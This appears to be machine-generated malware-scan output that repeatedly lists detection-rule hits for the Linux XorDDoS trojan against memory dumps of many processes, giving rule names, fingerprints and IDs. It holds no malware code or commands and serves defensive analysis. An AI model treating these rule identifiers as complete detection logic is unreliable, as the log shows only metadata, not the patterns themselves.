Source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
